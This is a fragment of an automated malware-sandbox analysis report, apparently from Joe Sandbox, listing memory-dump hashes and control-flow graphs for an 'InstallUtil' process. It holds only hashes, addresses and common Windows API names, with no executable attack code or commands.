                                                                                                  • Instruction ID: 5dc3f969191450a8e2fa310057f33d47872bfa92a46e7043621dabdfc85f43fa
                                                                                                  • Opcode Fuzzy Hash: 67406affeaf6f72741b84020015c333f4ba80917f3710fe1802df8b5278c1f66
                                                                                                  • Instruction Fuzzy Hash: 7A12F770E146598FDB54CFAAC98069EFBF2FF88304F24C169D858AB219D734A946CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523890799.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_62e0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3bb2b7afa45ca5514aee9d686d532b3c2b83224c9c94d8422c257a4b5e88ee8b
                                                                                                  • Instruction ID: 0818bf4b89af9174aad74c7eaf77b042a64fa1b0d863804342a0552b0c67cd72
                                                                                                  • Opcode Fuzzy Hash: 3bb2b7afa45ca5514aee9d686d532b3c2b83224c9c94d8422c257a4b5e88ee8b
                                                                                                  • Instruction Fuzzy Hash: EFD13B34A10605CFDB54DF69C588AA9BBF2BF88310F55C5B9E905AB361CB30EC81CB90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3522559543.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_61e0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f41570fa17dac07aa7aba8e0dd76614df4674fc93cc347b7e46b9a797513db88
                                                                                                  • Instruction ID: c4e399cdbd2728f14e24ef59f65e9e519c5507861002d358e2204bd81b3c3ddd
                                                                                                  • Opcode Fuzzy Hash: f41570fa17dac07aa7aba8e0dd76614df4674fc93cc347b7e46b9a797513db88
                                                                                                  • Instruction Fuzzy Hash: 3FB15C74E09618CFEB94CFAAC944B9DBBF2FB49308F1080A9D509AB355DB749985CF40
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3469350443.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_26c0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f0dc90d2ef71bf59bdf133c3dbc7d64baa55e579f73de2962c8aee88e09b5d54
                                                                                                  • Instruction ID: 2ca72a09531d9b442e537b9e6ad798e955669e92fc817fafb0ffa75468c56484
                                                                                                  • Opcode Fuzzy Hash: f0dc90d2ef71bf59bdf133c3dbc7d64baa55e579f73de2962c8aee88e09b5d54
                                                                                                  • Instruction Fuzzy Hash: 7AB18575E006588FDB58DF6AC944ADDBBF2AF89300F14C0AAD909AB365DB315E81CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3469350443.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_26c0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cd94476c0f226cd6a39f977e01c47579c562a5b7fada56efef3902a531ae67a2
                                                                                                  • Instruction ID: 993dd3d0a794653497d0ccdbd9c862d5628fd1ca6f148081bd4aab03065f4a63
                                                                                                  • Opcode Fuzzy Hash: cd94476c0f226cd6a39f977e01c47579c562a5b7fada56efef3902a531ae67a2
                                                                                                  • Instruction Fuzzy Hash: 8CB18575E006588FDB58DF6AC944ADDBBF2AF89300F14C0AAD909AB365DB305E81CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523013759.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6210000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8116e1b38dd0041be400a678d40a8237d113f5039546b63df0b45feff3da1acb
                                                                                                  • Instruction ID: 5f1ecaeee698c3a3f34ded5bc6c972238712d057474c07440df7d84c8e8f17b7
                                                                                                  • Opcode Fuzzy Hash: 8116e1b38dd0041be400a678d40a8237d113f5039546b63df0b45feff3da1acb
                                                                                                  • Instruction Fuzzy Hash: 99910070D29219CFEB45CFA9C4443EEBBF2EB59304F10816AD819BB254D7B90A45CF94
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523013759.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6210000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9b26c70fee77efd6196b70f76d3f5c6a5a9f3fd919f5779c4fe3a7a265cfdebe
                                                                                                  • Instruction ID: 1cec4acad108db290b223f18d0f9e0b6a7008c6c92f0db1c4ff680b9948443e1
                                                                                                  • Opcode Fuzzy Hash: 9b26c70fee77efd6196b70f76d3f5c6a5a9f3fd919f5779c4fe3a7a265cfdebe
                                                                                                  • Instruction Fuzzy Hash: C6810270D29219CFEB84CFA9C4443EEBBF2EB59304F10812AD819BB244D7B84A44CF94
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3521313599.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_61d0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 22dc9002b0d3017a8069ad02270ed535f4eec92e5ccae4a313c8a06db4cdef6c
                                                                                                  • Instruction ID: 1910709c2f4215ee70a133042d89075c6906e63e79f096b705690792894c366e
                                                                                                  • Opcode Fuzzy Hash: 22dc9002b0d3017a8069ad02270ed535f4eec92e5ccae4a313c8a06db4cdef6c
                                                                                                  • Instruction Fuzzy Hash: E6913870E05218CFEB98DFA9D848BAEB7F5FB89304F1090A9E01AA7355DB345985CF40
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3521313599.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_61d0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8226d2b2fb96bd2d93b4d94201f270458f473f9c093f4dc13353c34d705181ad
                                                                                                  • Instruction ID: de289c7cf313384841e9f0d890e53631af7ed55bc78953ec990df6d231207aff
                                                                                                  • Opcode Fuzzy Hash: 8226d2b2fb96bd2d93b4d94201f270458f473f9c093f4dc13353c34d705181ad
                                                                                                  • Instruction Fuzzy Hash: 39914774E05218CFEB98DFA9D848BADBBF5FB89304F1090A9E41AA7354DB345985CF40
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3527049438.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_66a0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f70f2454c5e760c58d57e24b9668cf08e9ad5057794eee4ecd0d67ff6f5b6e2a
                                                                                                  • Instruction ID: 0c82ea7c888ac4ba775f9cb11d3471d894cff48da0928e975be1bcdf06f5d14a
                                                                                                  • Opcode Fuzzy Hash: f70f2454c5e760c58d57e24b9668cf08e9ad5057794eee4ecd0d67ff6f5b6e2a
                                                                                                  • Instruction Fuzzy Hash: 9B911470D06218CFEBA4DFA9C8447DDBBF6BF89304F14A0A9D409AB254DB745A86CF41
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3521313599.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_61d0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 602d8d0605c60dd2c6d83b3285bbcae90812c0ab05e0abc1cd36aeecaceb0811
                                                                                                  • Instruction ID: afa41a1d22b1d6031479c3b8ef959845d201c8ea2f37ee003df5568ea7275089
                                                                                                  • Opcode Fuzzy Hash: 602d8d0605c60dd2c6d83b3285bbcae90812c0ab05e0abc1cd36aeecaceb0811
                                                                                                  • Instruction Fuzzy Hash: 2C813870E05218CFEB98DFA9D844BAEB7F6FF89304F1090A9D01AA7255DB345985CF40
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3522559543.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_61e0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dae1e7c9e06bb450ab64050dbeef08c27dba143de4670bea874d21c4e08e414c
                                                                                                  • Instruction ID: 7b1bf3d2a282f416f1978fbd799192ed8fb5336726a81b4f0dac0084accfb29f
                                                                                                  • Opcode Fuzzy Hash: dae1e7c9e06bb450ab64050dbeef08c27dba143de4670bea874d21c4e08e414c
                                                                                                  • Instruction Fuzzy Hash: 38614B70E05A18CFFB98DF65D884BA9BBF2FF49304F1094A6D009A7294EB748985CF40
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523013759.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6210000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 35e63267631b3e748a57179c1b77224c191c390ce13d2dafa4593ad5a56d524d
                                                                                                  • Instruction ID: 30dd3d0fad889d399930159532f5ac6fb4ea01a7e13ad433dd03e4c0125af5de
                                                                                                  • Opcode Fuzzy Hash: 35e63267631b3e748a57179c1b77224c191c390ce13d2dafa4593ad5a56d524d
                                                                                                  • Instruction Fuzzy Hash: CC51A671E016599BDB58CFABD8406DEBBF3AFC8300F14C17AD848AB224EA7059468F54
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3521313599.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_61d0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6dd63ba0d0d79244c52ccd11764962bffa62d2b2430e69f4d100b4557a8ef4d5
                                                                                                  • Instruction ID: 053843bbace9e63516f098b5835bead15f27a4fb15e9ee633d5c6cd809cc5421
                                                                                                  • Opcode Fuzzy Hash: 6dd63ba0d0d79244c52ccd11764962bffa62d2b2430e69f4d100b4557a8ef4d5
                                                                                                  • Instruction Fuzzy Hash: 18510370E05218CFEB58CFAAD844BDEBBF6BB89304F0480AAD409AB244D7750985CF90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3524271343.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6310000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dc1087df3b19e9991ba39423551aaf3b7b15568f24fe76a08ab97d35279bf038

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:10.6%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:185
                                                                                                  Total number of Limit Nodes:19

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 511 65cb318-65cb327 512 65cb329-65cb336 call 65ca2ac 511->512 513 65cb353-65cb357 511->513 520 65cb34c 512->520 521 65cb338-65cb346 call 65cb5a3 512->521 515 65cb359-65cb363 513->515 516 65cb36b-65cb3ac 513->516 515->516 522 65cb3ae-65cb3b6 516->522 523 65cb3b9-65cb3c7 516->523 520->513 521->520 529 65cb488-65cb548 521->529 522->523 524 65cb3c9-65cb3ce 523->524 525 65cb3eb-65cb3ed 523->525 527 65cb3d9 524->527 528 65cb3d0-65cb3d7 call 65ca2b8 524->528 530 65cb3f0-65cb3f7 525->530 534 65cb3db-65cb3e9 527->534 528->534 562 65cb54a-65cb54d 529->562 563 65cb550-65cb57b GetModuleHandleW 529->563 531 65cb3f9-65cb401 530->531 532 65cb404-65cb40b 530->532 531->532 535 65cb40d-65cb415 532->535 536 65cb418-65cb421 call 65c3934 532->536 534->530 535->536 542 65cb42e-65cb433 536->542 543 65cb423-65cb42b 536->543 544 65cb435-65cb43c 542->544 545 65cb451-65cb45e 542->545 543->542 544->545 547 65cb43e-65cb44e call 65c8af8 call 65ca2c8 544->547 551 65cb460-65cb47e 545->551 552 65cb481-65cb487 545->552 547->545 551->552 562->563 564 65cb57d-65cb583 563->564 565 65cb584-65cb598 563->565 564->565
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624162582.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65c0000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HandleModule
                                                                                                  • String ID:
                                                                                                  • API String ID: 4139908857-0
                                                                                                  • Opcode ID: efb98aa656c4737e2ec746c0b97e26450e8eb0a6fa264765b6f5c90a2fdeb997
                                                                                                  • Instruction ID: 87221bd43612ea4ec63a47bd1a540f4858788268714171ef8a59caacf1184f82
                                                                                                  • Opcode Fuzzy Hash: efb98aa656c4737e2ec746c0b97e26450e8eb0a6fa264765b6f5c90a2fdeb997
                                                                                                  • Instruction Fuzzy Hash: B0712370A00B058FD7A4DFAAD48575ABBF1FF88610F008A2DD49AD7A40DB75E845CF91

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 671 294e998-294e9b3 673 294e9b5-294e9dc 671->673 674 294e9dd-294e9fc call 294e1f4 671->674 679 294ea02-294ea46 674->679 680 294e9fe-294ea01 674->680 685 294ea4d-294ea61 679->685 686 294ea48-294ea4b 679->686 689 294ea67-294ea7e 685->689 690 294ea63-294ea66 685->690 686->685 692 294ea85-294eaf4 GlobalMemoryStatusEx 689->692 693 294ea80-294ea84 689->693 695 294eaf6-294eafc 692->695 696 294eafd-294eb25 692->696 693->692 695->696
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4610403247.0000000002940000.00000040.00000800.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2940000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3cd81ec0bf30a79347bef1dde368dce2b55eee1ce18d103911f019ac7c479272
                                                                                                  • Instruction ID: dc2ef77fc349360d4ae63459fb260d74795c75c8c9c7511652ee7a522ff35105
                                                                                                  • Opcode Fuzzy Hash: 3cd81ec0bf30a79347bef1dde368dce2b55eee1ce18d103911f019ac7c479272
                                                                                                  • Instruction Fuzzy Hash: BC412371E083999FCB14DFB9D8046AEBBF5BFC9210F1485ABD444A7241DB749840CBE1

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 699 65cd4e4-65cd556 701 65cd558-65cd55e 699->701 702 65cd561-65cd568 699->702 701->702 703 65cd56a-65cd570 702->703 704 65cd573-65cd5ab 702->704 703->704 705 65cd5b3-65cd612 CreateWindowExW 704->705 706 65cd61b-65cd653 705->706 707 65cd614-65cd61a 705->707 711 65cd655-65cd658 706->711 712 65cd660 706->712 707->706 711->712 713 65cd661 712->713 713->713
                                                                                                  APIs
                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 065CD602
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624162582.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65c0000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 716092398-0
                                                                                                  • Opcode ID: fe7c6d2488efac5d389d1ea356e17b69cba7b45ed236ecc831106823a714c6f9
                                                                                                  • Instruction ID: 153f1c454eb74187bb2aac731696c92113cd0604fa3d5ff1eed29e73f2db537e
                                                                                                  • Opcode Fuzzy Hash: fe7c6d2488efac5d389d1ea356e17b69cba7b45ed236ecc831106823a714c6f9
                                                                                                  • Instruction Fuzzy Hash: 4151AFB1D003499FDB14CF99D884ADEBBB5BF48314F24862EE819AB210D775A885CF90

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 714 65cd4f0-65cd556 715 65cd558-65cd55e 714->715 716 65cd561-65cd568 714->716 715->716 717 65cd56a-65cd570 716->717 718 65cd573-65cd612 CreateWindowExW 716->718 717->718 720 65cd61b-65cd653 718->720 721 65cd614-65cd61a 718->721 725 65cd655-65cd658 720->725 726 65cd660 720->726 721->720 725->726 727 65cd661 726->727 727->727
                                                                                                  APIs
                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 065CD602
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624162582.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65c0000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 716092398-0
                                                                                                  • Opcode ID: dc4170b829d7fb909e486eaced3cc0599e4ea2b691121a1762cfb3027bd80a15
                                                                                                  • Instruction ID: a92debf0f51422e45a6373692bb666fe8aeccfd16e2384353e4782586da62f19
                                                                                                  • Opcode Fuzzy Hash: dc4170b829d7fb909e486eaced3cc0599e4ea2b691121a1762cfb3027bd80a15
                                                                                                  • Instruction Fuzzy Hash: 0141AFB1D003499FDF14CF99C884ADEBBB5FF48310F24862AE819AB210D775A885CF90

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 728 65ce46c-65cfc6c 731 65cfd1c-65cfd3c call 65ca48c 728->731 732 65cfc72-65cfc77 728->732 739 65cfd3f-65cfd4c 731->739 733 65cfc79-65cfcb0 732->733 734 65cfcca-65cfd02 CallWindowProcW 732->734 741 65cfcb9-65cfcc8 733->741 742 65cfcb2-65cfcb8 733->742 737 65cfd0b-65cfd1a 734->737 738 65cfd04-65cfd0a 734->738 737->739 738->737 741->739 742->741
                                                                                                  APIs
                                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 065CFCF1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624162582.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65c0000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CallProcWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 2714655100-0
                                                                                                  • Opcode ID: e8c728fe19d7b2ff76516f0d359344725d042080b4d81726591e5d887b1bd7d0
                                                                                                  • Instruction ID: d9389a78a11dd87bef5461cd932ce1a8dc977d7eef3cb5b0a75e7c90fe4d755c
                                                                                                  • Opcode Fuzzy Hash: e8c728fe19d7b2ff76516f0d359344725d042080b4d81726591e5d887b1bd7d0
                                                                                                  • Instruction Fuzzy Hash: FD4129B5A00309CFDB54CF99C448AAABBF5FF88324F24849DD519A7321D774A941CFA0

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 745 65c3048-65c30e4 DuplicateHandle 746 65c30ed-65c310a 745->746 747 65c30e6-65c30ec 745->747 747->746
                                                                                                  APIs
                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 065C30D7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624162582.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65c0000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DuplicateHandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 3793708945-0
                                                                                                  • Opcode ID: 5bd69bb809a751188bceba82950f5ab3e99b5700d26e22e175909a00d7c0bc40
                                                                                                  • Instruction ID: 1affbe0b99ea49bd8f7fdb4a8c72a97840152ac188abfc05aff94764f727eaa6
                                                                                                  • Opcode Fuzzy Hash: 5bd69bb809a751188bceba82950f5ab3e99b5700d26e22e175909a00d7c0bc40
                                                                                                  • Instruction Fuzzy Hash: A121E4B5D00209DFDB10CF9AD984AEEBBF4FB48320F14841AE914A7350D379A954CFA5

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 750 65c3050-65c30e4 DuplicateHandle 751 65c30ed-65c310a 750->751 752 65c30e6-65c30ec 750->752 752->751
                                                                                                  APIs
                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 065C30D7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624162582.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65c0000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DuplicateHandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 3793708945-0
                                                                                                  • Opcode ID: d23c6ba0282d0f1a900956254e274beaff6c07f6c58cb82de7ae451903ae3ea3
                                                                                                  • Instruction ID: 9cb3ac24bbb06f05f886630146540237fbe88d8e659401567279d4f8e420961f
                                                                                                  • Opcode Fuzzy Hash: d23c6ba0282d0f1a900956254e274beaff6c07f6c58cb82de7ae451903ae3ea3
                                                                                                  • Instruction Fuzzy Hash: CA21B3B5D002499FDB10CF9AD984ADEBBF8FB48320F14841AE914A7250D379A954CFA5

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 755 294ea80-294eabe 757 294eac6-294eaf4 GlobalMemoryStatusEx 755->757 758 294eaf6-294eafc 757->758 759 294eafd-294eb25 757->759 758->759
                                                                                                  APIs
                                                                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 0294EAE7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4610403247.0000000002940000.00000040.00000800.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2940000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: GlobalMemoryStatus
                                                                                                  • String ID:
                                                                                                  • API String ID: 1890195054-0
                                                                                                  • Opcode ID: 5e7a1c043db0d9e3a05040faa1c0c84ec4fed44ddda4ea206df1d49988dc359c
                                                                                                  • Instruction ID: 52a3667ac5f8ec88cb559a6f40b43e993f6bd3c07c4b12b2afbe428f0da6e9a2
                                                                                                  • Opcode Fuzzy Hash: 5e7a1c043db0d9e3a05040faa1c0c84ec4fed44ddda4ea206df1d49988dc359c
                                                                                                  • Instruction Fuzzy Hash: FC1123B1C0065A9FDB10CF9AC544BDEFBF4BF48320F10816AE918A7240D7B8A954CFA1

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 762 65ca2ac-65cb548 764 65cb54a-65cb54d 762->764 765 65cb550-65cb57b GetModuleHandleW 762->765 764->765 766 65cb57d-65cb583 765->766 767 65cb584-65cb598 765->767 766->767
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,065CB334), ref: 065CB56E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624162582.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65c0000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HandleModule
                                                                                                  • String ID:
                                                                                                  • API String ID: 4139908857-0
                                                                                                  • Opcode ID: b9b02f78f806d559acd625ca18eaa13575c0e8ff7d6c4b3f9782ce3ddbfb7fdb
                                                                                                  • Instruction ID: b6b5aba9d1cbbc9ff87645f6f6d4c465aa36986a786857623c187b7fd3bf3fe1
                                                                                                  • Opcode Fuzzy Hash: b9b02f78f806d559acd625ca18eaa13575c0e8ff7d6c4b3f9782ce3ddbfb7fdb
                                                                                                  • Instruction Fuzzy Hash: 9411F3B5D006498FDB10CF9AD444B9EFBF8EB48324F14845AD819A7210D379A545CFA5

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624325830.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65d0000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5f6ef95dc612d7b057d7bb2df5dfdad7ef16df004b71c89a21c8ca929784317f
                                                                                                  • Instruction ID: 63a4b5e8b498f480c14d83a02a55c4f5175564fcbcdd56a372f58ca373161c26
                                                                                                  • Opcode Fuzzy Hash: 5f6ef95dc612d7b057d7bb2df5dfdad7ef16df004b71c89a21c8ca929784317f
                                                                                                  • Instruction Fuzzy Hash: F8623D30A0120A8FDB65EBA8D590A5EB7B6FFC5304F209A2DD0459F359DB75EC46CB80
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624325830.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65d0000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 036c90b24610bcac80210d1c184992b6523439ab3387af06f6f6376de5ace557
                                                                                                  • Instruction ID: 69945d5dc73215861e9800c885865bb92b94c454d9453b8e8981f7939c1e8f77
                                                                                                  • Opcode Fuzzy Hash: 036c90b24610bcac80210d1c184992b6523439ab3387af06f6f6376de5ace557
                                                                                                  • Instruction Fuzzy Hash: EF616E70F102199FEF649BA9D8547AEBBF6FB88300F208529E106AB394DF754C458F91
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624325830.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65d0000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c2fdad1234f1711fed46f98a93a3006fbeccae65e056042169c24c5006eb0e53
                                                                                                  • Instruction ID: d4cccd919f4461f0b6b8b1a277fc8965bc9d19ba0c95594493165598952a17aa
                                                                                                  • Opcode Fuzzy Hash: c2fdad1234f1711fed46f98a93a3006fbeccae65e056042169c24c5006eb0e53
                                                                                                  • Instruction Fuzzy Hash: E151CF31E01106DFCB64EBB8E4946ADBBB2FF85311F10887AE107D7291DB358955CB81
                                                                                                  Memory Dump Source
